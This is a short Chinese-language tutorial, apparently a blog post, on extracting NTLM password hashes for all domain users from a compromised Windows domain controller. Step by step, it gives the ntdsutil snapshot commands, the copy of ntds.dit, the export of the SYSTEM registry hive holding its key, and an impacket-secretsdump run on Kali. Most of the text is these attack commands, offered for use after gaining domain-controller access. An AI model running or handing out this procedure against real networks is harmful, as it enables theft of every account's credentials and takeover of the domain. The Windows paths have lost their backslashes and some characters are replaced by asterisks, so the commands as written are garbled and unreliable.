ntds.dit 获取域内用户ntlm hash

ntds.dit 获取域内用户ntlm hash

前提:在获取了域控权限后，可以通过读取ntds.dit 获取域内更多资产信息

概念：
在活动目录中，所有域内数据都保存在ntds.dit中，存储位置为 %SystemRoot%ntdsntds.dit,ntds.dit中包含用户名，散列值，组，OU,GPP等活动目录相关信息；
在域控主机中默认自带了ntdsutil.exe ，是一个为活动目录提供管理机制的程序，使用ntdsutil.exe 用于维护活动目录等，ntdsutil.exe 支持的 *** 作系统有win2003,win2008,win2012;

目的：通过域控win2008上的ntdsutil.exe 获取域内所有用户用户名和ntlm hash值；

实 *** 提取ntds.dit：
1，对于不熟悉的命令，通过查看帮助是个好习惯：
ntdsutil ?
ntdsutil snapshot ?

2,在域控主机命令行 通过ntdsutil 创建一个快照：
ntdsutil snapshot “activate instance ntds[活动实例名字]” create quit quit
通过此命令生成了一个GUID[快照ID ]为{a75d0907-6afc-405e-9776-4afef6784a7d}的快照

3，加载刚刚创建的快照【挂载快照】：ntdsutil snapshot “mount {GUID}” quit quit

挂载成功后将在C盘下生成一个文件夹：

执行命令，将ntds.dit复制得到C盘：
copy C:$SNAP_202111171154_VOLUMEC$WindowsNTDSntds.dit c:ntds.dit

4,卸载并删除挂载的快照：
ntdsutil snapshot “unmount {a75d0907-6afc-405e-9776-4afef6784a7d}” “delete {a75d0907-6afc-405e-9776-4afef6784a7d}” quit quit

5,导出ntds.dit后，需要将注册表中的hklmsystem键值对导出，因为该键值对中存放着ntds.dit的密钥，如果没有该密钥，将无法查看ntds.dit中的信息：
reg save hklmsystem C:system.hive

6,使用kali的impacket工具包导出散列值
将C盘下的ntds.dit 和 system.hive复制到kali,执行：
impacket-secretsdump -system system.hive -ntds ntds.dit local